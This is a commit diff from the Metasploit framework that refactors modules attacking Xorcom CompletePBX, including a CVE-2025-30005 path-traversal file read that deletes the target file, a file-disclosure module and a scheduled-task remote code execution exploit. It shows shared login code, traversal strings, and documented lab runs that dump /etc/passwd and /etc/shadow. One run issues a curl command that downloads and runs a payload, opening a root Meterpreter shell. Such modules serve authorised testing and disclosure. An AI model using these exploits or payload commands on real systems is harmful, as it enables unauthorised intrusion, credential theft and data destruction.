feat(xorcom): add shared CompletePBX mixin, refactor modules, update docs

Author: Chocapikk

documentation/modules/auxiliary/scanner/http/xorcom_completepbx_diagnostics_file_read.md

@@ -42,9 +42,21 @@ run
 
 ## Options
 
-- `USERNAME`: Admin username for authentication.
-- `PASSWORD`: Admin password for authentication.
-- `TARGETFILE`: Path of the file to retrieve (**before automatic deletion**).
+### USERNAME
+
+Admin username for authentication.
+
+### PASSWORD
+
+Admin password for authentication.
+
+### TARGETFILE
+
+Path of the file to retrieve (**before automatic deletion**).
+
+### DefangedMode
+
+Safety switch (true by default). Set to **false** to actually perform the read-and-delete operation.
 
 ## Scenarios
 
@@ -58,17 +70,32 @@ run
 **Steps**:
 
 ```bash
-msf6 auxiliary(xorcom_completepbx_diagnostics_file_read) > run https://rnd-repo.cpbxmt-demo187.xorcom.com
-[*] Running module against 142.93.233.32
+msf6 auxiliary(scanner/http/xorcom_completepbx_diagnostics_file_read) > run http://192.168.1.32/
+[*] Running module against 192.168.1.32
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[-] Auxiliary aborted due to failure: bad-config: 
+Are you *SURE* you want to execute the module against the target?
+Running this module will attempt to read and delete the file
+specified by TARGETFILE on the remote system.
+
+If you have explicit authorisation, re-run with:
+    set DefangedMode false
 
-[*] Attempting authentication with username: admin
-[+] Authentication successful! Session ID: sid=c8f08002130196439747e488447260f48d595c51
-[*] Attempting to read file: ../../../../../../../../../../../etc/passwd
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/xorcom_completepbx_diagnostics_file_read) > set DefangedMode false
+DefangedMode => false
+msf6 auxiliary(scanner/http/xorcom_completepbx_diagnostics_file_read) > run http://192.168.1.32/
+[*] Running module against 192.168.1.32
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[!] This exploit WILL delete the target file if permissions allow.
+[*] Attempting to read file: ../../../../../../../../../../..//etc/passwd
 [*] ZIP file received, attempting to list files
 [*] Files inside ZIP archive:
- - ../../../../../../../../../../../etc/passwd
- - full_20250318_160522
- - audit_20250318_160522.log
+ - ../../../../../../../../../../..//etc/passwd
+ - full_20250716_191240
+ - audit_20250716_191240.log
 [+] Content of /etc/passwd:
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
@@ -86,24 +113,24 @@ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
-gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
-_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
-systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
-systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
-systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
-messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
-systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
-mysql:x:105:108:MySQL Server,,,:/nonexistent:/bin/false
-postfix:x:106:110::/var/spool/postfix:/usr/sbin/nologin
-tcpdump:x:107:112::/nonexistent:/usr/sbin/nologin
-sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
-dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
-Debian-snmp:x:110:113::/var/lib/snmp:/bin/false
-asterisk:x:111:114:Asterisk PBX daemon,,,:/var/lib/asterisk:/usr/sbin/nologin
-cc-cloud-rec:x:998:998::/var/lib/cc-cloud-rec:/sbin/nologin
-
-[!] WARNING: This exploit causes the deletion of the requested file on the target if the privileges allows it.
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
+messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
+avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
+pbx:x:1000:1000:,,,:/home/pbx:/bin/bash
+mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
+postfix:x:104:113::/var/spool/postfix:/usr/sbin/nologin
+tcpdump:x:105:115::/nonexistent:/usr/sbin/nologin
+Debian-snmp:x:106:116::/var/lib/snmp:/bin/false
+_chrony:x:107:117:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
+dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
+asterisk:x:109:118:Asterisk PBX daemon,,,:/var/lib/asterisk:/usr/sbin/nologin
+cc-cloud-rec:x:999:995::/var/lib/cc-cloud-rec:/sbin/nologin
+
 [*] Auxiliary module execution completed
 ```
 

documentation/modules/auxiliary/scanner/http/xorcom_completepbx_file_disclosure.md

@@ -37,9 +37,17 @@ run
 
 ## Options
 
-- `USERNAME`: Admin username for authentication.
-- `PASSWORD`: Admin password for authentication.
-- `TARGETFILE`: Path of the file to retrieve (Base64-encoded in request).
+### USERNAME
+
+Admin username for authentication.
+
+### PASSWORD`
+
+Admin password for authentication.
+
+### TARGETFILE
+
+Path of the file to retrieve (Base64-encoded in request).
 
 ## Scenarios
 
@@ -53,10 +61,10 @@ run
 **Steps**:
 
 ```bash
-msf6 auxiliary(admin/http/xorcom_completepbx_file_disclosure) > run http://192.168.56.101/ 
-[*] Running module against 192.168.56.101
-[*] Attempting authentication with username: admin
-[+] Authentication successful! Session ID: sid=535c401396c04a4c92266c2d1457200e6f7c391a
+msf6 auxiliary(scanner/http/xorcom_completepbx_file_disclosure) > run http://192.168.1.32/
+[*] Running module against 192.168.1.32
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
 [*] Attempting to read file: /etc/shadow (Encoded as: ,L2V0Yy9zaGFkb3c=)
 [+] Content of /etc/shadow:
 root:$y$j9T$/vXScZij/ykAtLtP9H1nQ/$KK43hfpOrxdZwAZljjvS5dnF0ipg8NqpCOj9gbLJ9OA:19829:0:99999:7:::
@@ -92,11 +100,6 @@ dnsmasq:!:19829::::::
 polkitd:!*:19829::::::
 asterisk:!:19829::::::
 cc-cloud-rec:!:19829::::::
-<br />                                                                                    <b>Fatal error</b>:  Uncaught TypeError: proc_close(): supplied resource is not a valid process resource in /usr/share/ombutel/www/includes/helper.php:61
-Stack trace:
-#0 /usr/share/ombutel/www/includes/helper.php(61): proc_close()
-#1 [internal function]: ombutel\helper::ombutel\{closure}()                               #2 {main}                                                                                   thrown in <b>/usr/share/ombutel/www/includes/helper.php</b> on line <b>61</b><br />
-
 [*] Auxiliary module execution completed
 ```
 

documentation/modules/exploit/linux/http/xorcom_completepbx_scheduler.md

@@ -44,8 +44,13 @@ run
 
 ## Options
 
-- `USERNAME`: Admin username for authentication.
-- `PASSWORD`: Admin password for authentication.
+### USERNAME
+
+Admin username for authentication.
+
+### PASSWORD
+
+Admin password for authentication.
 
 ## Scenarios
 
@@ -59,35 +64,39 @@ run
 **Steps**:
 
 ```bash
-msf6 exploit(linux/http/xorcom_completepbx_scheduler) > run http://192.168.56.101/
-[*] Started reverse TCP handler on 192.168.56.1:4444
+msf6 exploit(linux/http/xorcom_completepbx_scheduler) > run http://192.168.1.32/
+[*] Command to run on remote host: curl -so ./HEuUpqtYDav http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA;chmod +x ./HEuUpqtYDav;./HEuUpqtYDav&
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking if the target is running CompletePBX...
-[+] Detected CompletePBX on 192.168.56.101:80
+[+] Detected CompletePBX on 192.168.1.32:80
 [+] The target appears to be vulnerable.
 [*] Attempting authentication with username: admin
-[+] Authentication successful! Session ID: sid=3b6c002860ddb5ca104e25eaa439b35052c443df
-[*] Creating malicious scheduled task with description: Ut quis eum sed.
+[+] Authentication successful! Session ID: sid=697e43b483efc1ac316461cde1fbb5d470abc3b4
+[*] Creating malicious scheduled task with description: Possimus quibusdam assumenda minima.
 [+] Malicious task successfully created.
-[*] Retrieving latest task ID for description: Ut quis eum sed....
-[+] Found task with ID: 38
-[*] Executing malicious task ID 38...
-[*] Sending stage (3045380 bytes) to 192.168.56.101
+[*] Retrieving latest task ID for description: Possimus quibusdam assumenda minima....
+[+] Found task with ID: 18
+[*] Executing malicious task ID 18...
+[*] Client 192.168.1.32 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 192.168.1.32 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.1.32
 [+] Task executed successfully!
-[*] Sending delete request (mode=delete) for task ID 38...
-[*] Sending delete request (mode=deleteConfirmed) for task ID 38...
-[+] Task 38 deleted successfully!
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:33372) at 2025-03-18 17:18:23 +0100
-
-meterpreter > getuid
-Server username: root
-meterpreter > sysinfo
+[*] Sending delete request (mode=delete) for task ID 18...
+[*] Sending delete request (mode=deleteConfirmed) for task ID 18...
+[+] Task 18 deleted successfully!
+[*] Meterpreter session 6 opened (192.168.1.36:4444 -> 192.168.1.32:40800) at 2025-07-16 21:11:31 +0200
+
+meterpreter > sysinfo 
 Computer     : localhost.localdomain
 OS           : Debian 12.5 (Linux 6.1.0-20-amd64)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter >
 ```
 
 ### Impact

lib/msf/core/exploit/remote/http/xorcom_completepbx.rb

@@ -0,0 +1,60 @@
+# lib/msf/core/exploit/remote/http/xorcom_completepbx.rb
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        #
+        # Shared routines for Xorcom CompletePBX modules
+        #
+        module XorcomCompletePBX
+          # Probe root page and return appropriate CheckCode
+          # @return [Msf::Exploit::CheckCode]
+          def is_completepbx
+            vprint_status('Checking if the target is running CompletePBX...')
+            res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')
+            return Exploit::CheckCode::Unknown('No response from target.') unless res
+            return Exploit::CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+            doc = res.get_html_document
+            if doc.at('//meta[@name="description"][@content="CompletePBX"]') ||
+               doc.at('//meta[@name="application-name"][@content="Ombutel"]')
+              vprint_good("Detected CompletePBX on #{peer}")
+              return Exploit::CheckCode::Appears
+            end
+
+            Exploit::CheckCode::Safe('Target does not appear to be running CompletePBX.')
+          end
+
+          # Authenticate with supplied USERNAME/PASSWORD and return session cookie
+          # @return [String] the "sid=..." cookie value
+          # @raise  [Msf::Exploit::Failure] on authentication failure
+          def completepbx_login
+            vprint_status("Attempting authentication with username: #{datastore['USERNAME']}")
+            res = send_request_cgi(
+              'uri' => normalize_uri(target_uri.path, 'login'),
+              'method' => 'POST',
+              'ctype' => 'application/x-www-form-urlencoded',
+              'vars_post' => {
+                'userid' => datastore['USERNAME'],
+                'userpass' => datastore['PASSWORD']
+              }
+            )
+            unless res&.code == 200
+              vprint_error('Authentication failed')
+              fail_with(Failure::NoAccess, 'Authentication failed')
+            end
+
+            sid = res.get_cookies.scan(/sid=[a-f0-9]+/).first
+            unless sid
+              vprint_error('No session ID received')
+              fail_with(Failure::NoAccess, 'No session ID received')
+            end
+
+            vprint_good("Authentication successful! Session ID: #{sid}")
+            sid
+          end
+        end
+      end
+    end
+  end
+end

modules/auxiliary/scanner/http/xorcom_completepbx_diagnostics_file_read.rb

@@ -5,6 +5,8 @@
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::XorcomCompletePBX
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -22,7 +24,9 @@ def initialize(info = {})
 
           The vulnerability is identified as CVE-2025-30005.
         },
-        'Author' => ['Valentin Lobstein'],
+        'Author' => [
+          'Valentin Lobstein' # Research and module development
+        ],
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2025-30005'],
@@ -40,9 +44,8 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'Base path of the CompletePBX instance', '/']),
         OptString.new('USERNAME', [true, 'Username for authentication', 'admin']),
-        OptString.new('PASSWORD', [true, 'Password for authentication' ]),
+        OptString.new('PASSWORD', [true, 'Password for authentication']),
         OptString.new('TARGETFILE', [true, 'File to retrieve from the system', '/etc/passwd'])
       ]
     )
@@ -53,35 +56,8 @@ def initialize(info = {})
     )
   end
 
-  def login
-    print_status("Attempting authentication with username: #{datastore['USERNAME']}")
-
-    res = send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], 'login'),
-      'method' => 'POST',
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'userid' => datastore['USERNAME'],
-        'userpass' => datastore['PASSWORD']
-      }
-    })
-
-    unless res
-      fail_with(Failure::Unreachable, 'No response from target')
-    end
-
-    unless res.code == 200
-      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}")
-    end
-
-    sid_cookie = res.get_cookies.scan(/sid=[a-f0-9]+/).first
-
-    unless sid_cookie
-      fail_with(Failure::NoAccess, 'Authentication failed: No session ID received')
-    end
-
-    print_good("Authentication successful! Session ID: #{sid_cookie}")
-    return sid_cookie
+  def check
+    is_completepbx
   end
 
   def run
@@ -101,8 +77,8 @@ def run
     print_warning('This exploit WILL delete the target file if permissions allow.')
     sleep(2)
 
-    sid_cookie = login
-    target_file = "../../../../../../../../../../..#{datastore['TARGETFILE']}"
+    sid_cookie = completepbx_login
+    target_file = "../../../../../../../../../../../#{datastore['TARGETFILE']}"
 
     print_status("Attempting to read file: #{target_file}")